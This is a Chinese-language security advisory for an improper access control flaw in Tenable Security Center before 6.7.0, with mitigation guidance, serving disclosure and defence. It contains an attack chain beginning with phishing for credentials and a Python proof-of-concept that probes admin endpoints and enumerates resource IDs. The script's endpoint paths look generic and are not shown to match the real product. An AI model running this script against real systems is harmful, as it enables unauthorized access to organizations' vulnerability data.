CVE-2025-36636：Tenable Security Center访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2025-36636

漏洞类型

访问控制不当（Improper Access Control）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenable Security Center

漏洞概述

CVE-2025-36636是存在于Tenable Security Center中的一个访问控制不当（Improper Access Control）漏洞。该漏洞影响6.7.0之前的所有版本，由Tenable安全团队通过[email protected]报告并披露，披露日期为2025年10月8日。

Tenable Security Center是Tenable公司推出的一款企业级漏洞管理平台，广泛用于集中化的漏洞扫描、资产发现、风险评估和合规性管理。该平台通常部署在企业内网中，由安全运维团队使用，用于管理和监控组织内部的各类安全风险。

该漏洞的核心问题在于，Tenable Security Center在版本6.7.0之前未能正确实施基于角色的访问控制（RBAC）机制。经过身份认证的低权限用户能够访问超出其授权范围的系统功能和资源区域。这意味着在多用户、多角色的企业环境中，普通用户可能越权访问管理员或其他高权限用户才能查看和操作的功能模块，从而导致未经授权的信息访问和数据修改。

根据CVSS 3.1评分体系，该漏洞评分为4.3分，属于中危级别。攻击者需要拥有有效的低权限账户凭证，通过网络即可发起攻击，无需用户交互。漏洞对机密性影响为低，对完整性影响为低，对可用性无影响。虽然该漏洞不会直接导致系统瘫痪或大规模数据泄露，但在多租户或多角色的企业环境中，可能造成敏感安全信息的未授权访问，对组织的整体安全态势构成潜在威胁。

技术细节

该漏洞属于典型的访问控制不当（Broken Access Control / IDOR类）问题，是OWASP Top 10中常见的安全缺陷类别。

**漏洞原理：**
Tenable Security Center在6.7.0之前的版本中，对用户权限的验证逻辑存在缺陷。系统在处理用户请求时，未能充分校验当前认证用户是否具有访问目标资源或执行目标操作的权限。具体而言，应用层缺少对用户角色（Role）和作用域（Scope）的严格校验，导致低权限用户可以通过直接构造请求URL或API调用来访问其权限范围之外的页面、数据或功能。

**利用方式：**
1. 攻击者首先需要获取一个有效的低权限用户账户凭证（用户名和密码）。
2. 使用该凭证登录Tenable Security Center Web界面，获取有效的会话Cookie或Session Token。
3. 认证后，攻击者通过修改请求参数或直接访问受限的资源路径（如管理面板、扫描配置、其他用户的资产数据等），绕过前端的权限限制。
4. 由于服务端未做充分的权限校验，请求被成功处理，攻击者能够查看或修改其权限范围之外的数据。

**影响范围：**
- 未经授权访问受限的管理功能
- 查看其他用户或组织的资产扫描结果
- 可能修改扫描配置或策略
- 泄露敏感的安全评估数据

Tenable已在6.7.0版本中修复了该问题，增加了对用户权限的严格校验，确保用户只能访问其授权范围内的资源。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者通过钓鱼、社会工程或其他方式获取Tenable Security Center的低权限用户账户凭证。

STEP 2

步骤2：身份认证

使用获取的凭证登录Tenable Security Center系统，建立有效的认证会话。

STEP 3

步骤3：权限探测

通过枚举URL路径、API端点或修改请求参数，探测系统中的受限资源和功能。

STEP 4

步骤4：越权访问

利用服务端权限校验缺陷，绕过访问控制机制，成功访问超出授权范围的资源或功能。

STEP 5

步骤5：数据获取或篡改

查看其他用户/组织的敏感扫描数据，或修改系统配置、扫描策略等受限操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36636 - Tenable Security Center Improper Access Control PoC
# This PoC demonstrates how a low-privileged authenticated user can access
# resources outside their authorized scope.

import requests

TARGET_URL = "https://target-tenable-sc.example.com"
LOW_PRIV_USER = "lowpriv_user"
LOW_PRIV_PASS = "password123"

# Step 1: Authenticate with low-privilege credentials
session = requests.Session()
login_url = f"{TARGET_URL}/login"
login_data = {
    "username": LOW_PRIV_USER,
    "password": LOW_PRIV_PASS
}

response = session.post(login_url, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Attempt to access admin-restricted resources
# These endpoints should be restricted to admin users only
admin_endpoints = [
    "/admin/users",
    "/admin/organizations",
    "/admin/scan-templates",
    "/scans/configurations",
    "/reports/advanced",
    "/api/v1/users",
    "/api/v1/organizations",
    "/api/v1/scans/configurations"
]

print("[*] Testing access to restricted endpoints...")
for endpoint in admin_endpoints:
    url = f"{TARGET_URL}{endpoint}"
    resp = session.get(url)
    status = resp.status_code
    if status == 200:
        print(f"[VULNERABLE] {endpoint} -> HTTP {status} (Unauthorized access granted!)")
    elif status in [403, 401]:
        print(f"[SAFE] {endpoint} -> HTTP {status} (Properly restricted)")
    else:
        print(f"[?] {endpoint} -> HTTP {status}")

# Step 3: Attempt IDOR by modifying resource IDs
# Try to access other users' data by changing ID parameters
print("\n[*] Testing IDOR vulnerability...")
idor_endpoints = [
    "/scans/results?scanId=1",
    "/reports/view?reportId=1",
    "/assets/details?assetId=1"
]

for endpoint in idor_endpoints:
    for resource_id in range(1, 10):
        url = f"{TARGET_URL}{endpoint.split('=')[0]}={resource_id}"
        resp = session.get(url)
        if resp.status_code == 200 and "admin" in resp.text.lower():
            print(f"[VULNERABLE] IDOR found at ID={resource_id}")
            break

影响范围

Tenable Security Center < 6.7.0

防御指南

临时缓解措施

在无法立即升级到6.7.0版本的情况下，建议采取以下临时缓解措施：1）严格审查所有用户账户的权限配置，确保低权限用户仅拥有必要的最小权限；2）通过Web应用防火墙（WAF）或反向代理限制对管理端点和敏感API路径的访问；3）加强监控日志，对异常访问行为（如低权限用户访问管理页面）设置告警；4）限制可访问Tenable Security Center的网络范围，仅允许可信IP地址访问；5）确保所有用户使用强密码并定期更换，降低凭证泄露风险。